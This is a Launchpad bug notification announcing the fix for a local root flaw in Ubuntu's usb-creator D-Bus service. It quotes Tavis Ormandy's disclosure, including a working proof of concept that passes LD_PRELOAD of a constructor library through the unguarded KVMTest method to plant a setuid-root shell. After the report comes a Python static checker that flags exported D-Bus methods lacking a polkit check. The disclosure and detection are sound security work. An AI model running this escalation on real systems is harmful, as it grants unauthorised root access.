[Bug 1447396] Re: Tavis Ormandy discovered a local root vulnerability with the com.ubuntu.USBCreator dbus service
Launchpad Bug Tracker
1447396 at bugs.launchpad.net
Thu Apr 23 14:03:38 UTC 2015
This bug was fixed in the package usb-creator - 0.2.67ubuntu0.1
---------------
usb-creator (0.2.67ubuntu0.1) vivid-security; urgency=medium
* SECURITY UPDATE: privilege escalation via missing polkit check
(LP: #1447396)
- bin/usb-creator-helper, dbus/com.ubuntu.usbcreator.policy.in: add
proper polkit integration for KVM use.
- CVE number pending
-- Marc Deslauriers <marc.deslauriers at ubuntu.com> Wed, 22 Apr 2015 23:10:43 -0400
** Changed in: usb-creator (Ubuntu Vivid)
Status: Confirmed => Fix Released
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to usb-creator in Ubuntu.
https://bugs.launchpad.net/bugs/1447396
Title:
Tavis Ormandy discovered a local root vulnerability with the
com.ubuntu.USBCreator dbus service
Status in usb-creator package in Ubuntu:
Fix Released
Status in usb-creator source package in Precise:
Fix Released
Status in usb-creator source package in Trusty:
Fix Released
Status in usb-creator source package in Utopic:
Fix Released
Status in usb-creator source package in Vivid:
Fix Released
Bug description:
Reported on oss-security: http://www.openwall.com/lists/oss-security/2015/04/22/12
Text from Tavis follows:
Hello,
[as-per previous discussion on the vendors list, skipping closed
discussion of low-severity issue]
On my Ubuntu VM, I have a D-Bus service listening on
com.ubuntu.USBCreator. As far as I can tell, this is installed by
default.
It looks like the author intended for all the methods to call
check_polkit, but KVMTest doesn't.
This seems like an obvious mistake, and the following appears to work
on my machine:
$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)
Thanks, Tavis.
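The root cause named in the report is an exported method that never reaches check_polkit. A static check for that pattern follows, as an added example that is not part of the original report or of usb-creator's code. The sample service, its com.example names and start_vm are constructed for illustration, and treating any decorator whose final name is "method" as a D-Bus export is an assumption.

```python
import ast

# Constructed sample, not usb-creator's source: two exported methods, one of
# which never reaches the authorization helper (the pattern in the report).
SAMPLE_SERVICE = '''
import dbus.service
IFACE = "com.example.Helper"

class Helper(dbus.service.Object):
    @dbus.service.method(IFACE, in_signature="s", sender_keyword="sender",
                         connection_keyword="conn")
    def Unmount(self, device, sender=None, conn=None):
        check_polkit(sender, conn, "com.example.helper.unmount")

    @dbus.service.method(IFACE, in_signature="sa{ss}")
    def KVMTest(self, device, env):
        start_vm(device, env)  # hypothetical helper, no authorization check

    def _not_exported(self):
        pass
'''

def _last_name(node):
    """Final identifier of a Name or Attribute chain, '' for anything else."""
    if isinstance(node, ast.Attribute):
        return node.attr
    return node.id if isinstance(node, ast.Name) else ""

def _is_exported(func):
    """True if decorated with dbus.service.method (bare or called)."""
    for dec in func.decorator_list:
        target = dec.func if isinstance(dec, ast.Call) else dec
        if _last_name(target) == "method":  # assumption: name match only
            return True
    return False

def _calls(func, name):
    """True if the function contains any call whose final name is `name`."""
    return any(isinstance(n, ast.Call) and _last_name(n.func) == name
               for n in ast.walk(func))

def unguarded_dbus_methods(source, guard="check_polkit"):
    """Sorted names of exported D-Bus methods that never call the guard."""
    funcs = (n for n in ast.walk(ast.parse(source))
             if isinstance(n, (ast.FunctionDef, ast.AsyncFunctionDef)))
    return sorted(f.name for f in funcs
                  if _is_exported(f) and not _calls(f, guard))

if __name__ == "__main__":
    print(unguarded_dbus_methods(SAMPLE_SERVICE))
```

A hit means the guard is never called anywhere in the method. A guard called on only some code paths passes this check and still needs manual review.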